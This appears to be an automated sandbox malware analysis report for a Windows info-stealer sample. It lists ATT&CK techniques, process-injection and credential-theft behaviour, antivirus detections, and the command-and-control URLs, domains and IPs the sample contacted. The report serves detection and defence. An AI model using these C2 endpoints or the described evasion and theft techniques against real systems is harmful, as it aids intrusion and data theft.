          Valid AccountsShared Modules1Registry Run Keys / Startup Folder1Process Injection612Deobfuscate/Decode Files or Information1OS Credential Dumping1File and Directory Discovery2Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumIngress Tool Transfer3Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationSystem Shutdown/Reboot1
          Default AccountsExploitation for Client Execution1Boot or Logon Initialization ScriptsRegistry Run Keys / Startup Folder1Obfuscated Files or Information4LSASS MemorySystem Information Discovery14Remote Desktop ProtocolData from Local System1Exfiltration Over BluetoothEncrypted Channel1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Software Packing12Security Account ManagerSecurity Software Discovery131SMB/Windows Admin SharesEmail Collection1Automated ExfiltrationNon-Application Layer Protocol4Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)File Deletion1NTDSVirtualization/Sandbox Evasion2Distributed Component Object ModelClipboard Data1Scheduled TransferApplication Layer Protocol114SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptVirtualization/Sandbox Evasion2LSA SecretsProcess Discovery2SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonProcess Injection612Cached Domain CredentialsRemote System Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsRundll321DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 499380 Sample: MV ROCKET_PDA.exe Startdate: 08/10/2021 Architecture: WINDOWS Score: 100 58 www.lkdwaterfowlers.com 2->58 68 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->68 70 Found malware configuration 2->70 72 Malicious sample detected (through community Yara rule) 2->72 74 10 other signatures 2->74 11 MV ROCKET_PDA.exe 17 2->11         started        signatures3 process4 file5 56 C:\Users\user\AppData\Local\Temp\...\lqnx.dll, PE32 11->56 dropped 92 Injects a PE file into a foreign processes 11->92 15 MV ROCKET_PDA.exe 11->15         started        signatures6 process7 signatures8 94 Modifies the context of a thread in another process (thread injection) 15->94 96 Maps a DLL or memory area into another process 15->96 98 Sample uses process hollowing technique 15->98 100 Queues an APC in another process (thread injection) 15->100 18 explorer.exe 3 6 15->18 injected process9 dnsIp10 60 www.brasbux.com 199.192.27.31, 49883, 80 NAMECHEAP-NETUS United States 18->60 62 www.alhudadevelopers.com 5.77.41.136, 49867, 49879, 80 IOMART-ASGB United Kingdom 18->62 64 26 other IPs or domains 18->64 48 C:\Users\user\AppData\...\5jsdph8p9l_r.exe, PE32 18->48 dropped 76 System process connects to network (likely due to code injection or exploit) 18->76 78 Benign windows process drops PE files 18->78 80 Performs DNS queries to domains with low reputation 18->80 23 rundll32.exe 1 12 18->23         started        26 5jsdph8p9l_r.exe 16 18->26         started        29 5jsdph8p9l_r.exe 16 18->29         started        31 5jsdph8p9l_r.exe 16 18->31         started        file11 signatures12 process13 file14 82 Tries to steal Mail credentials (via file access) 23->82 84 Self deletion via cmd delete 23->84 86 Tries to harvest and steal browser information (history, passwords, etc) 23->86 90 3 other signatures 23->90 33 cmd.exe 2 23->33         started        36 cmd.exe 1 23->36         started        50 C:\Users\user\AppData\Local\Temp\...\lqnx.dll, PE32 26->50 dropped 88 Injects a PE file into a foreign processes 26->88 38 5jsdph8p9l_r.exe 26->38         started        52 C:\Users\user\AppData\Local\Temp\...\lqnx.dll, PE32 29->52 dropped 40 5jsdph8p9l_r.exe 29->40         started        54 C:\Users\user\AppData\Local\Temp\...\lqnx.dll, PE32 31->54 dropped 42 5jsdph8p9l_r.exe 31->42         started        signatures15 process16 signatures17 66 Tries to harvest and steal browser information (history, passwords, etc) 33->66 44 conhost.exe 33->44         started        46 conhost.exe 36->46         started        process18

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          MV ROCKET_PDA.exe37%VirustotalBrowse
          MV ROCKET_PDA.exe100%Joe Sandbox ML

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Local\Temp\nsv161C.tmp\lqnx.dll100%AviraTR/Crypt.ZPACK.Gen
          C:\Users\user\AppData\Local\Temp\nsy35E9.tmp\lqnx.dll100%AviraTR/Crypt.ZPACK.Gen
          C:\Users\user\AppData\Local\Temp\nsfEE22.tmp\lqnx.dll100%AviraTR/Crypt.ZPACK.Gen
          C:\Users\user\AppData\Local\Temp\nsk8EF9.tmp\lqnx.dll100%AviraTR/Crypt.ZPACK.Gen
          C:\Users\user\AppData\Local\Temp\nsv161C.tmp\lqnx.dll100%Joe Sandbox ML
          C:\Users\user\AppData\Local\Temp\nsy35E9.tmp\lqnx.dll100%Joe Sandbox ML
          C:\Users\user\AppData\Local\Temp\nsfEE22.tmp\lqnx.dll100%Joe Sandbox ML
          C:\Users\user\AppData\Local\Temp\nsk8EF9.tmp\lqnx.dll100%Joe Sandbox ML
          C:\Users\user\AppData\Local\Temp\Gw4n\5jsdph8p9l_r.exe100%Joe Sandbox ML

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          38.0.5jsdph8p9l_r.exe.400000.0.unpack100%AviraHEUR/AGEN.1130366Download File
          0.0.MV ROCKET_PDA.exe.400000.0.unpack100%AviraHEUR/AGEN.1130366Download File
          40.1.5jsdph8p9l_r.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          0.2.MV ROCKET_PDA.exe.400000.0.unpack100%AviraHEUR/AGEN.1130366Download File
          39.2.5jsdph8p9l_r.exe.e820000.3.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          1.2.MV ROCKET_PDA.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          1.0.MV ROCKET_PDA.exe.400000.0.unpack100%AviraHEUR/AGEN.1130366Download File
          37.2.5jsdph8p9l_r.exe.400000.0.unpack100%AviraHEUR/AGEN.1130366Download File
          41.2.5jsdph8p9l_r.exe.e800000.3.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          40.0.5jsdph8p9l_r.exe.400000.0.unpack100%AviraHEUR/AGEN.1130366Download File
          42.1.5jsdph8p9l_r.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          38.2.5jsdph8p9l_r.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          42.2.5jsdph8p9l_r.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          41.2.5jsdph8p9l_r.exe.400000.0.unpack100%AviraHEUR/AGEN.1130366Download File
          13.2.rundll32.exe.3754408.1.unpack100%AviraTR/Patched.Ren.GenDownload File
          37.2.5jsdph8p9l_r.exe.e800000.3.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          41.0.5jsdph8p9l_r.exe.400000.0.unpack100%AviraHEUR/AGEN.1130366Download File
          0.2.MV ROCKET_PDA.exe.e7d0000.3.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          13.2.rundll32.exe.584796c.4.unpack100%AviraTR/Patched.Ren.GenDownload File
          37.0.5jsdph8p9l_r.exe.400000.0.unpack100%AviraHEUR/AGEN.1130366Download File
          42.0.5jsdph8p9l_r.exe.400000.0.unpack100%AviraHEUR/AGEN.1130366Download File
          39.0.5jsdph8p9l_r.exe.400000.0.unpack100%AviraHEUR/AGEN.1130366Download File
          1.1.MV ROCKET_PDA.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          40.2.5jsdph8p9l_r.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          38.1.5jsdph8p9l_r.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          39.2.5jsdph8p9l_r.exe.400000.0.unpack100%AviraHEUR/AGEN.1130366Download File

          Domains

          SourceDetectionScannerLabelLink
          serenityminded.com0%VirustotalBrowse

          URLs

          SourceDetectionScannerLabelLink
          http://www.cmledbetter.com/nqn4/?T2MpwT=j/acvWTIX1IIGG71msTYH2BmWHO6PBbUk8yOFfU9QnNmzI6YXFgStfXcNuKpZIImGkZw&VDK0L=5jZhjDchE0%Avira URL Cloudsafe
          http://www.qgt114.com/nqn4/?T2MpwT=NO7HiJjWp23E/NVr6f5oxbZpLiVezzkACgfnzaC9yrbwkfp2XaPNKLC9V4BmJOtFaRlB&VDK0L=5jZhjDchE0%Avira URL Cloudsafe
          http://www.trust-top.net/nqn4/?T2MpwT=n9MfkADJlGV/yt7v9R1KFrF+APzpIOm/DYQis6iYSXuIjWSgUnKCQKlQm8ZLyuu4NEBr&VDK0L=5jZhjDchE0%Avira URL Cloudsafe
          http://www.ayushigangwar.com/nqn4/?CJBlp=0Brh6Vr8UbBX&T2MpwT=59bmqUDXor7TXV4b71NCQ0d0nCVif23i1yH5+9ZmJc5hgCU7y+ZN9z0btTsWzGv6OrGw0%Avira URL Cloudsafe
          http://www.eco1tnpasumo3.xyz/nqn4/?CJBlp=0Brh6Vr8UbBX&T2MpwT=vanPYQUuZ3XFRC7SYcRcV+oaGEE9ir47lHLJmRrDHNXTaYXBSumhPRu6vjoy21MSp9tX0%Avira URL Cloudsafe
          http://www.8straps.com/nqn4/?T2MpwT=PjOGATJe62g+EVXM60l0TMrP33Vq4i5cZ7PlVlprXq2FiCzLypjhbH9eK52lYLlj7XZy&CJBlp=0Brh6Vr8UbBX0%Avira URL Cloudsafe
          http://www.14attrayanteoffre.com/nqn4/?T2MpwT=i5AiHmtUG4jSq3EeZPtwH7k+iHy5Ue3XoSuQEDxJDegsoJeUadNIxOzHTmstHRTgws5R&VDK0L=5jZhjDchE0%Avira URL Cloudsafe
          http://www.alhudadevelopers.com/nqn4/?T2MpwT=vhYC9jp4QxyX9P9jU1kmIMvJN+CriLjGecmH3lCQz9Uj4oO69oLOp3ieJLqJz40Fbqlq&CJBlp=0Brh6Vr8UbBX0%Avira URL Cloudsafe
          http://www.alhudadevelopers.com/nqn4/?T2MpwT=vhYC9jp4QxyX9P9jU1kmIMvJN+CriLjGecmH3lCQz9Uj4oO69oLOp3ieJLqJz40Fbqlq&VDK0L=5jZhjDchE0%Avira URL Cloudsafe
          http://www.buyfood.store/nqn4/?T2MpwT=NpvTDsLqAO0mKT6/pRGYfFBszb31UzDXQRSyhvlh8npGorp/J75qkvnZqxnVuczwTiaF&VDK0L=5jZhjDchE0%Avira URL Cloudsafe
          http://www.serenityminded.com/nqn4/?T2MpwT=vamNjrgbVY8P7naByDvhT5uBlUfF4mww4F7uwpIcOdwQ9dI2x1NbU7t9TbuGfOUGmVqs&VDK0L=5jZhjDchE0%Avira URL Cloudsafe
          http://www.geefmijcorona.online/nqn4/?T2MpwT=3boPinz1+GTktZtFPn4Wh9WVNEiaR4p62fPMr1up18b62Q31EEwhNzwdf2qpwnv2m2XV&VDK0L=5jZhjDchE0%Avira URL Cloudsafe
          http://www.palisadestahoeresorts.com/nqn4/?T2MpwT=eKIp1y2l1SOv2+qM13sD3ni05izmwIgUfk+SveOGf2fPDQ1ngTqk3VQOR6nY8FES9U2Z&VDK0L=5jZhjDchE0%Avira URL Cloudsafe
          http://www.alsafi.website/nqn4/?T2MpwT=WdqFsCJDDrfJVVKQ96FU4wJF/oM38RLKT57XIM51VttjxsJHubphilqOW6BmhpvfH7LL&CJBlp=0Brh6Vr8UbBX0%Avira URL Cloudsafe
          http://www.eco1tnpasumo3.xyz/nqn4/0%Avira URL Cloudsafe
          http://www.eco1tnpasumo3.xyz/nqn4/?T2MpwT=vanPYQUuZ3XFRC7SYcRcV+oaGEE9ir47lHLJmRrDHNXTaYXBSumhPRu6vjoy21MSp9tX&VDK0L=5jZhjDchE0%Avira URL Cloudsafe
          http://www.qgt114.com/nqn4/?CJBlp=0Brh6Vr8UbBX&T2MpwT=NO7HiJjWp23E/NVr6f5oxbZpLiVezzkACgfnzaC9yrbwkfp2XaPNKLC9V4BmJOtFaRlB0%Avira URL Cloudsafe
          http://www.geefmijcorona.online/nqn4/0%Avira URL Cloudsafe
          http://www.lawsonboards.com/nqn4/?T2MpwT=74ly5i6dv9aFaIanl04WAUuvBIDqS28RkAjgjYkeNyzOIPYzy6OHh47fS3mwhl7OaPd1&CJBlp=0Brh6Vr8UbBX0%Avira URL Cloudsafe
          http://www.brasbux.com/nqn4/?T2MpwT=Wjqq3kKWaZessn6+0zor2VbG1MsxXB3N8HOi7pnP0i0lcv2FzdILsKCUGbtokKNHvSaZ&VDK0L=5jZhjDchE0%Avira URL Cloudsafe
          www.geefmijcorona.online/nqn4/0%Avira URL Cloudsafe
          http://www.eco1tnpasumo3.xyz0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          www.alhudadevelopers.com
          		5.77.41.136
          		truetrue
            		unknown
            www.brasbux.com
            		199.192.27.31
            		truetrue
              		unknown
              serenityminded.com
              		167.172.158.202
              		truetrueunknown
              HDRedirect-LB7-5a03e1c2772e1c9c.elb.us-east-1.amazonaws.com
              		3.223.115.185
              		truefalse
                		high
                www.qgt114.com
                		155.159.216.37
                		truetrue
                  		unknown
                  www.alsafi.website
                  		66.96.147.118
                  		truetrue
                    		unknown
                    shops.myshopify.com
                    		23.227.38.74
                    		truetrue
                      		unknown
                      cmledbetter.com
                      		198.37.103.70
                      		truefalse
                        		high
                        www.eco1tnpasumo3.xyz
                        		150.95.255.38
                        		truefalse
                          		high
                          lawsonboards.com
                          		34.102.136.180
                          		truefalse
                            		high
                            www.ayushigangwar.com
                            		104.21.66.86
                            		truefalse
                              		high
                              www.trust-top.net
                              		183.181.96.79
                              		truefalse
                                		high
                                www.buyfood.store
                                		208.91.197.91
                                		truefalse
                                  		high
                                  palisadestahoeresorts.com
                                  		34.102.136.180
                                  		truefalse
                                    		high
                                    www.geefmijcorona.online
                                    		145.131.10.226
                                    		truefalse
                                      		high
                                      14attrayanteoffre.com
                                      		37.187.131.150
                                      		truefalse
                                        		high
                                        www.stlaurenthp.com
                                        		unknown
                                        		unknownfalse
                                          		high
                                          www.earthsidesoulalchemist.com
                                          		unknown
                                          		unknownfalse
                                            		high
                                            www.lawsonboards.com
                                            		unknown
                                            		unknownfalse
                                              		high
                                              www.serenityminded.com
                                              		unknown
                                              		unknownfalse
                                                		high
                                                www.cosmetictreat.com
                                                		unknown
                                                		unknownfalse
                                                  		high
                                                  www.minecrafttop.net
                                                  		unknown
                                                  		unknownfalse
                                                    		high
                                                    www.14attrayanteoffre.com
                                                    		unknown
                                                    		unknownfalse
                                                      		high
                                                      www.palisadestahoeresorts.com
                                                      		unknown
                                                      		unknownfalse
                                                        		high
                                                        www.cmledbetter.com
                                                        		unknown
                                                        		unknownfalse
                                                          		high
                                                          www.8straps.com
                                                          		unknown
                                                          		unknownfalse
                                                            		high
                                                            www.lkdwaterfowlers.com
                                                            		unknown
                                                            		unknownfalse
                                                              		high
                                                              www.totusnet.com
                                                              		unknown
                                                              		unknownfalse
                                                                		high

                                                                Contacted URLs

                                                                NameMaliciousAntivirus DetectionReputation
                                                                http://www.cmledbetter.com/nqn4/?T2MpwT=j/acvWTIX1IIGG71msTYH2BmWHO6PBbUk8yOFfU9QnNmzI6YXFgStfXcNuKpZIImGkZw&VDK0L=5jZhjDchEtrue
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://www.qgt114.com/nqn4/?T2MpwT=NO7HiJjWp23E/NVr6f5oxbZpLiVezzkACgfnzaC9yrbwkfp2XaPNKLC9V4BmJOtFaRlB&VDK0L=5jZhjDchEtrue
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://www.trust-top.net/nqn4/?T2MpwT=n9MfkADJlGV/yt7v9R1KFrF+APzpIOm/DYQis6iYSXuIjWSgUnKCQKlQm8ZLyuu4NEBr&VDK0L=5jZhjDchEtrue
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://www.ayushigangwar.com/nqn4/?CJBlp=0Brh6Vr8UbBX&T2MpwT=59bmqUDXor7TXV4b71NCQ0d0nCVif23i1yH5+9ZmJc5hgCU7y+ZN9z0btTsWzGv6OrGwtrue
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://www.eco1tnpasumo3.xyz/nqn4/?CJBlp=0Brh6Vr8UbBX&T2MpwT=vanPYQUuZ3XFRC7SYcRcV+oaGEE9ir47lHLJmRrDHNXTaYXBSumhPRu6vjoy21MSp9tXtrue
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://www.8straps.com/nqn4/?T2MpwT=PjOGATJe62g+EVXM60l0TMrP33Vq4i5cZ7PlVlprXq2FiCzLypjhbH9eK52lYLlj7XZy&CJBlp=0Brh6Vr8UbBXtrue
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://www.14attrayanteoffre.com/nqn4/?T2MpwT=i5AiHmtUG4jSq3EeZPtwH7k+iHy5Ue3XoSuQEDxJDegsoJeUadNIxOzHTmstHRTgws5R&VDK0L=5jZhjDchEtrue
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://www.alhudadevelopers.com/nqn4/?T2MpwT=vhYC9jp4QxyX9P9jU1kmIMvJN+CriLjGecmH3lCQz9Uj4oO69oLOp3ieJLqJz40Fbqlq&CJBlp=0Brh6Vr8UbBXtrue
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://www.alhudadevelopers.com/nqn4/?T2MpwT=vhYC9jp4QxyX9P9jU1kmIMvJN+CriLjGecmH3lCQz9Uj4oO69oLOp3ieJLqJz40Fbqlq&VDK0L=5jZhjDchEtrue
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://www.buyfood.store/nqn4/?T2MpwT=NpvTDsLqAO0mKT6/pRGYfFBszb31UzDXQRSyhvlh8npGorp/J75qkvnZqxnVuczwTiaF&VDK0L=5jZhjDchEtrue
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://www.serenityminded.com/nqn4/?T2MpwT=vamNjrgbVY8P7naByDvhT5uBlUfF4mww4F7uwpIcOdwQ9dI2x1NbU7t9TbuGfOUGmVqs&VDK0L=5jZhjDchEtrue
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://www.geefmijcorona.online/nqn4/?T2MpwT=3boPinz1+GTktZtFPn4Wh9WVNEiaR4p62fPMr1up18b62Q31EEwhNzwdf2qpwnv2m2XV&VDK0L=5jZhjDchEtrue
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://www.palisadestahoeresorts.com/nqn4/?T2MpwT=eKIp1y2l1SOv2+qM13sD3ni05izmwIgUfk+SveOGf2fPDQ1ngTqk3VQOR6nY8FES9U2Z&VDK0L=5jZhjDchEfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://www.alsafi.website/nqn4/?T2MpwT=WdqFsCJDDrfJVVKQ96FU4wJF/oM38RLKT57XIM51VttjxsJHubphilqOW6BmhpvfH7LL&CJBlp=0Brh6Vr8UbBXtrue
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://www.eco1tnpasumo3.xyz/nqn4/true
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://www.eco1tnpasumo3.xyz/nqn4/?T2MpwT=vanPYQUuZ3XFRC7SYcRcV+oaGEE9ir47lHLJmRrDHNXTaYXBSumhPRu6vjoy21MSp9tX&VDK0L=5jZhjDchEtrue
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://www.qgt114.com/nqn4/?CJBlp=0Brh6Vr8UbBX&T2MpwT=NO7HiJjWp23E/NVr6f5oxbZpLiVezzkACgfnzaC9yrbwkfp2XaPNKLC9V4BmJOtFaRlBtrue
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://www.geefmijcorona.online/nqn4/true
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://www.lawsonboards.com/nqn4/?T2MpwT=74ly5i6dv9aFaIanl04WAUuvBIDqS28RkAjgjYkeNyzOIPYzy6OHh47fS3mwhl7OaPd1&CJBlp=0Brh6Vr8UbBXfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://www.brasbux.com/nqn4/?T2MpwT=Wjqq3kKWaZessn6+0zor2VbG1MsxXB3N8HOi7pnP0i0lcv2FzdILsKCUGbtokKNHvSaZ&VDK0L=5jZhjDchEtrue
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                www.geefmijcorona.online/nqn4/true
                                                                • Avira URL Cloud: safe
                                                                		low

                                                                URLs from Memory and Binaries

                                                                NameSourceMaliciousAntivirus DetectionReputation
                                                                http://www.msn.com/?ocid=iehpLMEMrundll32.exe, 0000000D.00000002.802024799.00000000037BD000.00000004.00000020.sdmpfalse
                                                                  		high
                                                                  https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0.rundll32.exe, 0000000D.00000002.801986233.000000000379D000.00000004.00000020.sdmpfalse
                                                                    		high
                                                                    https://www.google.com/chrome/static/images/favicons/favicon-16x16.pngrundll32.exe, 0000000D.00000002.802024799.00000000037BD000.00000004.00000020.sdmpfalse
                                                                      		high
                                                                      http://nsis.sf.net/NSIS_ErrorErrorMV ROCKET_PDA.exefalse
                                                                        		high
                                                                        http://www.msn.com/ocid=iehprundll32.exe, 0000000D.00000002.801986233.000000000379D000.00000004.00000020.sdmpfalse
                                                                          		high
                                                                          https://www.google.com/chrome/rundll32.exe, 0000000D.00000002.801986233.000000000379D000.00000004.00000020.sdmpfalse
                                                                            		high
                                                                            https://www.google.com/chrome/thank-you.htmlstatcb=0&installdataindex=empty&defaultbrowser=0rundll32.exe, 0000000D.00000002.801986233.000000000379D000.00000004.00000020.sdmpfalse
                                                                              		high
                                                                              http://www.msn.com/de-ch/?ocid=iehprundll32.exe, 0000000D.00000002.801857936.000000000373A000.00000004.00000020.sdmp, rundll32.exe, 0000000D.00000002.801986233.000000000379D000.00000004.00000020.sdmpfalse
                                                                                		high
                                                                                http://nsis.sf.net/NSIS_Error5jsdph8p9l_r.exe, 5jsdph8p9l_r.exe, 00000027.00000002.776362591.0000000000409000.00000004.00020000.sdmp, 5jsdph8p9l_r.exe, 00000028.00000000.770366097.0000000000409000.00000008.00020000.sdmp, 5jsdph8p9l_r.exe, 00000029.00000002.791582542.0000000000409000.00000004.00020000.sdmp, 5jsdph8p9l_r.exe, 0000002A.00000000.786981832.0000000000409000.00000008.00020000.sdmp, MV ROCKET_PDA.exefalse
                                                                                  		high
                                                                                  https://www.google.com/chrome/static/images/favicons/favicon-16x16.png~rundll32.exe, 0000000D.00000002.802024799.00000000037BD000.00000004.00000020.sdmpfalse
                                                                                    		high
                                                                                    http://www.msn.com/de-ch/?ocid=iehpLMEMh8rundll32.exe, 0000000D.00000002.802024799.00000000037BD000.00000004.00000020.sdmpfalse
                                                                                      		high
                                                                                      http://www.msn.com/de-ch/ocid=iehpNrundll32.exe, 0000000D.00000002.802024799.00000000037BD000.00000004.00000020.sdmpfalse
                                                                                        		high
                                                                                        https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0rundll32.exe, 0000000D.00000002.801986233.000000000379D000.00000004.00000020.sdmpfalse
                                                                                          		high
                                                                                          http://www.eco1tnpasumo3.xyzrundll32.exe, 0000000D.00000002.802978266.000000000603B000.00000004.00020000.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          		unknown

                                                                                          Contacted IPs

                                                                                          • No. of IPs < 25%
                                                                                          • 25% < No. of IPs < 50%
                                                                                          • 50% < No. of IPs < 75%
                                                                                          • 75% < No. of IPs

                                                                                          Public

                                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                                          104.21.66.86
                                                                                          		www.ayushigangwar.comUnited States
                                                                                          		13335CLOUDFLARENETUSfalse
                                                                                          66.96.147.118
                                                                                          		www.alsafi.websiteUnited States
                                                                                          		29873BIZLAND-SDUStrue
                                                                                          37.187.131.150
                                                                                          		14attrayanteoffre.comFrance
                                                                                          		16276OVHFRfalse
                                                                                          198.37.103.70
                                                                                          		cmledbetter.comUnited States
                                                                                          		397373H4Y-TECHNOLOGIESUSfalse
                                                                                          23.227.38.74
                                                                                          		shops.myshopify.comCanada
                                                                                          		13335CLOUDFLARENETUStrue
                                                                                          199.192.27.31
                                                                                          		www.brasbux.comUnited States
                                                                                          		22612NAMECHEAP-NETUStrue
                                                                                          3.223.115.185
                                                                                          		HDRedirect-LB7-5a03e1c2772e1c9c.elb.us-east-1.amazonaws.comUnited States
                                                                                          		14618AMAZON-AESUSfalse
                                                                                          150.95.255.38
                                                                                          		www.eco1tnpasumo3.xyzJapan7506INTERQGMOInternetIncJPfalse
                                                                                          145.131.10.226
                                                                                          		www.geefmijcorona.onlineNetherlands
                                                                                          		8315SENTIANLfalse
                                                                                          167.172.158.202
                                                                                          		serenityminded.comUnited States
                                                                                          		14061DIGITALOCEAN-ASNUStrue
                                                                                          208.91.197.91
                                                                                          		www.buyfood.storeVirgin Islands (BRITISH)
                                                                                          		40034CONFLUENCE-NETWORK-INCVGfalse
                                                                                          183.181.96.79
                                                                                          		www.trust-top.netJapan9371SAKURA-CSAKURAInternetIncJPfalse
                                                                                          34.102.136.180
                                                                                          		lawsonboards.comUnited States
                                                                                          		15169GOOGLEUSfalse
                                                                                          5.77.41.136
                                                                                          		www.alhudadevelopers.comUnited Kingdom
                                                                                          		20860IOMART-ASGBtrue
                                                                                          155.159.216.37
                                                                                          		www.qgt114.comSouth Africa
                                                                                          		137951CLAYERLIMITED-AS-APClayerLimitedHKtrue

                                                                                          General Information

                                                                                          Joe Sandbox Version:33.0.0 White Diamond
                                                                                          Analysis ID:499380
                                                                                          Start date:08.10.2021
                                                                                          Start time:09:59:09
                                                                                          Joe Sandbox Product:CloudBasic
                                                                                          Overall analysis duration:0h 15m 7s
                                                                                          Hypervisor based Inspection enabled:false
                                                                                          Report type:full
                                                                                          Sample file name:MV ROCKET_PDA.exe
                                                                                          Cookbook file name:default.jbs
                                                                                          Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                          Number of analysed new started processes analysed:41
                                                                                          Number of new started drivers analysed:0
                                                                                          Number of existing processes analysed:0
                                                                                          Number of existing drivers analysed:0
                                                                                          Number of injected processes analysed:0
                                                                                          Technologies:
                                                                                          • HCA enabled
                                                                                          • EGA enabled
                                                                                          • HDC enabled
                                                                                          • AMSI enabled
                                                                                          Analysis Mode:default
                                                                                          Analysis stop reason:Timeout
                                                                                          Detection:MAL
                                                                                          Classification:mal100.troj.spyw.evad.winEXE@22/11@37/15
                                                                                          EGA Information:Failed
                                                                                          HDC Information:
                                                                                          • Successful, ratio: 51.5% (good quality ratio 46.6%)
                                                                                          • Quality average: 74.7%
                                                                                          • Quality standard deviation: 31.3%
                                                                                          HCA Information:
                                                                                          • Successful, ratio: 86%
                                                                                          • Number of executed functions: 140
                                                                                          • Number of non-executed functions: 118
                                                                                          Cookbook Comments:
                                                                                          • Adjust boot time
                                                                                          • Enable AMSI
                                                                                          • Found application associated with file extension: .exe
                                                                                          • Override analysis time to 240s for rundll32
                                                                                          Warnings:
                                                                                          Show All
                                                                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, dllhost.exe, BackgroundTransferHost.exe, consent.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe
                                                                                          • Excluded IPs from analysis (whitelisted): 184.28.84.57, 20.50.102.62, 20.54.110.249, 40.112.88.60, 2.20.178.56, 2.20.178.10, 20.199.120.151, 2.20.178.33, 2.20.178.24, 20.199.120.182, 20.82.210.154, 20.199.120.85, 20.82.209.183
                                                                                          • Excluded domains from analysis (whitelisted): iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, a767.dspw65.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, wns.notify.trafficmanager.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, client.wns.windows.com, iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, wu-shim.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, download.windowsupdate.com.edgesuite.net, ris.api.iris.microsoft.com, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                                                                          • Not all processes where analyzed, report is missing behavior information
                                                                                          • Report creation exceeded maximum time and may have missing disassembly code information.
